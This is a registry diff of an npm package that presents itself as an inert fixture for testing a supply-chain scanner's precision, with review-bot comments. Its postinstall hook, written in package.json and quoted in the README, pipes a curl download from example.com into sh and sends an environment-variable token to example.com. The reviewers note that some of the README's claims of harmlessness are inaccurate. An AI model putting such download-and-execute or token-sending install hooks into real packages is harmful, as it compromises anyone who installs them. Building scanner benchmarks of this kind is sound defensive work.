vybscan-testbed-inert-postinstall 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +50 -0
- package/package.json +15 -0
package/README.md
ADDED
|
@@ -0,0 +1,50 @@
|
|
|
1
|
+
# vybscan-testbed-inert-postinstall
|
|
2
|
+
|
|
3
|
+
**This is an inert security-research test fixture. Do not install or depend on this package.**
|
|
4
|
+
|
|
5
|
+
It exists so that [Vybscan](https://github.com/vybscan-testbed)'s supply-chain scanner
|
|
6
|
+
(`step3ClaudeAnalysis` — install-time behavioral analysis) has a real, live, published npm
|
|
7
|
+
package to score its **precision** against: a postinstall script that HAS the shape of two
|
|
8
|
+
classic attack patterns (network download-and-execute, credential exfiltration) but has NO
|
|
9
|
+
genuine achievable malicious intent, because there is no real destination and no real secret
|
|
10
|
+
behind either pattern. Vybscan's own detection prompt says not to flag mere capability:
|
|
11
|
+
|
|
12
|
+
> "Do NOT flag a package merely for HAVING an install script, making a network request, reading
|
|
13
|
+
> an environment variable, or using dynamic code — these are common and legitimate. Require
|
|
14
|
+
> evidence of malicious INTENT ..., not just the presence of a capability."
|
|
15
|
+
|
|
16
|
+
This fixture is the test of that exact line — a scanner that flags on capability alone would
|
|
17
|
+
wrongly flag this; a scanner that correctly requires achievable intent should stay silent.
|
|
18
|
+
|
|
19
|
+
## Why the postinstall script looks the way it does
|
|
20
|
+
|
|
21
|
+
```
|
|
22
|
+
curl -fsSL https://example.com/setup.sh | sh; node -e "require('https').get('https://example.com/collect?t='+encodeURIComponent(process.env.INERT_TESTBED_FAKE_TOKEN||'none'))" || true
|
|
23
|
+
```
|
|
24
|
+
|
|
25
|
+
This textually resembles two classic attack patterns (download-and-execute, credential
|
|
26
|
+
exfiltration) — deliberately, so a scanner reading the script content has something real to
|
|
27
|
+
flag. But it cannot do anything harmful:
|
|
28
|
+
|
|
29
|
+
- **Every network reference points only at `example.com`** — the domain IANA permanently
|
|
30
|
+
reserves under [RFC 2606](https://www.iana.org/help/example-domains) specifically for
|
|
31
|
+
documentation and testing. It serves a static placeholder page at `/` and a 404 for any other
|
|
32
|
+
path (verified: `curl https://example.com/setup.sh` → `404`). Piping that into `sh` produces
|
|
33
|
+
harmless "command not found" errors — no code from any real, adversary-controlled source is
|
|
34
|
+
ever fetched or executed.
|
|
35
|
+
- **`INERT_TESTBED_FAKE_TOKEN` is a fictional variable name** that is never set in any real
|
|
36
|
+
environment. The script never reads or transmits an actual secret, credential, or token —
|
|
37
|
+
there is nothing sensitive for it to send anywhere, even in principle.
|
|
38
|
+
- **`|| true`** ensures the script always exits `0`, so it can never break an `npm install`.
|
|
39
|
+
|
|
40
|
+
## What this is for
|
|
41
|
+
|
|
42
|
+
Part of the [Vybscan testbed](https://github.com/vybscan-testbed) — a precision/recall
|
|
43
|
+
benchmark for the Vybscan security scanner. See `precision-sca`'s `ANSWERS.yml` for the
|
|
44
|
+
ground-truth label this package's `postinstall` script is expected to receive: **must stay
|
|
45
|
+
silent** (capability without achievable intent). Its sibling fixture,
|
|
46
|
+
`vybscan-testbed-obfuscated-postinstall` (used in `recall-sca-postinstall`), tests the opposite
|
|
47
|
+
case — an install-time pattern with no legitimate non-malicious use, which SHOULD be flagged.
|
|
48
|
+
|
|
49
|
+
Questions / concerns about this package: open an issue at
|
|
50
|
+
[github.com/vybscan-testbed](https://github.com/vybscan-testbed).
|
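Review bot: the sentence "Piping that into `sh` produces harmless 'command not found' errors" in the first bullet does not match the script shown above it, because `curl -fsSL` includes `-f`, which makes curl exit non-zero on an HTTP 404 without writing the response body to stdout; `sh` therefore reads empty input and exits 0 silently, and no "command not found" output appears. Either reword the bullet to say that `-f` discards the 404 body and `sh` receives nothing, or drop `-f` if the intent really is for `sh` to see the HTML error page. It is also worth stating explicitly that the fixture's inertness is environmental rather than structural: it relies on `example.com` continuing to return 404 for `/setup.sh` and on DNS resolving honestly in whatever environment runs the install, so the benchmark harness should execute this fixture with networking disabled so that the expected "must stay silent" verdict does not depend on external state.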
package/package.json
ADDED
|
@@ -0,0 +1,15 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "vybscan-testbed-inert-postinstall",
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"description": "INERT SECURITY-RESEARCH TEST FIXTURE — do not install. Part of the Vybscan testbed accuracy benchmark (github.com/vybscan-testbed). This package's postinstall script HAS the shape of a supply-chain attack pattern (network call, env-var read) but NO genuine achievable malicious intent — used to test that Vybscan's install-time scanner correctly distinguishes 'capability' from 'intent' and stays silent (see its own detection prompt: 'do not flag merely for having a network request, reading an environment variable... require evidence of malicious intent, not just the presence of a capability'). Every network reference points only to example.com (IANA-reserved, RFC 2606, serves a static placeholder page for any documentation/test use — https://www.iana.org/help/example-domains), and the referenced environment variable is a fictional name that is never set in any real environment — so there is no real destination and no real secret for this script to ever act on. See README.md.",
|
|
5
|
+
"author": "Vybscan Testbed (github.com/vybscan-testbed)",
|
|
6
|
+
"license": "MIT",
|
|
7
|
+
"private": false,
|
|
8
|
+
"scripts": {
|
|
9
|
+
"postinstall": "curl -fsSL https://example.com/setup.sh | sh; node -e \"require('https').get('https://example.com/collect?t='+encodeURIComponent(process.env.INERT_TESTBED_FAKE_TOKEN||'none'))\" || true"
|
|
10
|
+
},
|
|
11
|
+
"repository": {
|
|
12
|
+
"type": "git",
|
|
13
|
+
"url": "https://github.com/vybscan-testbed/precision-sca"
|
|
14
|
+
}
|
|
15
|
+
}
|
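Review bot: the claim that `|| true` guarantees a zero exit holds only when npm's `script-shell` is a POSIX shell; under the default `cmd.exe` on Windows, `sh` is normally absent and `true` is not a built-in, so the `postinstall` value can exit non-zero and fail the install, contradicting the README's "can never break an `npm install`". Either document the POSIX-only assumption in `description`/README or restructure the script so the guard does not depend on the shell. Separately, `require('https').get(...)` has no `'error'` listener, so in an offline sandbox node terminates on the unhandled `'error'` event (typically an `ENOTFOUND` stack trace on stderr) before `|| true` masks the status; anyone reading scanner or CI logs for this fixture should expect that noise and not treat it as a detection signal. Minor: `"private": false` is the npm default and can be omitted, and the `repository.url` pointing at `precision-sca` is consistent with the README's reference to that repo's `ANSWERS.yml`.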